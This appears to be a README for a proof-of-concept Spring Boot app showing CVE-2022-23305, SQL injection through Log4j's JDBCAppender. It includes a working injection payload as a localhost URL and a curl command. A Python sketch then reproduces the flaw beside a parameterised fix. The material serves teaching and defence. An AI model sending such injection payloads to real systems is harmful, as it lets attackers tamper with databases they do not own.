CVE-2022-23305 Log4j JDBCAppender SQL injection POC

This is a very simple Spring Boot based application that demonstrates the CVE-2022-23305 vulnerability. It uses Apache Maven, Spring Boot, Spring MVC, and the H2 in-memory database to log a single entry, taken from a URL query string parameter. Because Log4j is configured to use a JDBCAppender, the logged value is vulnerable to SQL injection.

See src/main/java/poc/InjectionController.java for the logging statement.
See the src/main/resource folder for all the configuration files.

You can run the application with Java and Maven by running "mvn clean spring-boot:run".
You can also run it as a Docker container:
 docker build --tag log4j-poc .
 docker run -p 8080:8080 log4j-poc

The app will be available at http://localhost:8080/.
To exploit the vulnerability, submit a SQL fragment as the parameter that gets logged:
 "http://localhost:8080/?param=');insert into logs values(':("
The response lists the stored log entries, including one that was added by the SQL injected through the parameter.
To do the same with curl, use:
 curl 'http://localhost:8080/?param=%27);insert%20into%20logs%20values(%27:('
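To make the mechanism concrete, here is an added example (not part of this repository) that mimics how a Log4j 1.x JDBCAppender splices the logged message into its SQL pattern, beside the parameterised form that closes the hole. It uses Python's built-in sqlite3 as a stand-in for H2; the single-column logs table and the %m pattern are assumptions, since the README does not show the actual configuration.

```python
import sqlite3

# Constructed stand-in for a Log4j 1.x JDBCAppender "sql" pattern: the real
# appender substitutes the formatted log message for %m with no escaping.
# The single-column table is an assumption, not this repository's schema.
SQL_PATTERN = "INSERT INTO logs VALUES ('%m')"

# The exact query-string value from the README, URL-decoded.
PAYLOAD = "');insert into logs values(':("


def fresh_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE logs (message TEXT)")
    return conn


def vulnerable_log(conn: sqlite3.Connection, message: str) -> None:
    """Mimic JDBCAppender: splice the message into the SQL text.
    executescript() stands in for a JDBC driver (H2 in the POC) that
    accepts several ';'-separated statements in one execute call."""
    sql = SQL_PATTERN.replace("%m", message)
    conn.executescript(sql)


def safe_log(conn: sqlite3.Connection, message: str) -> None:
    """Hardened form: the message travels as a bound parameter, so the
    statement structure is fixed before any attacker-controlled data arrives."""
    conn.execute("INSERT INTO logs VALUES (?)", (message,))


def rows(conn: sqlite3.Connection) -> list:
    return [r[0] for r in conn.execute("SELECT message FROM logs ORDER BY rowid")]


def demo() -> tuple:
    """Log the same payload both ways and return what each table contains."""
    vuln = fresh_db()
    vulnerable_log(vuln, PAYLOAD)
    safe = fresh_db()
    safe_log(safe, PAYLOAD)
    return rows(vuln), rows(safe)


if __name__ == "__main__":
    v, s = demo()
    print("pattern-substituted appender stored:", v)  # ['', ':('] (two rows)
    print("parameterised appender stored:", s)        # one row: the literal payload
```

The vulnerable path ends up with two rows, neither of which is the message that was actually logged, while the parameterised path stores the payload verbatim as a single row; auditing appender configurations for a %m inside a quoted SQL literal is the quickest way to spot this pattern.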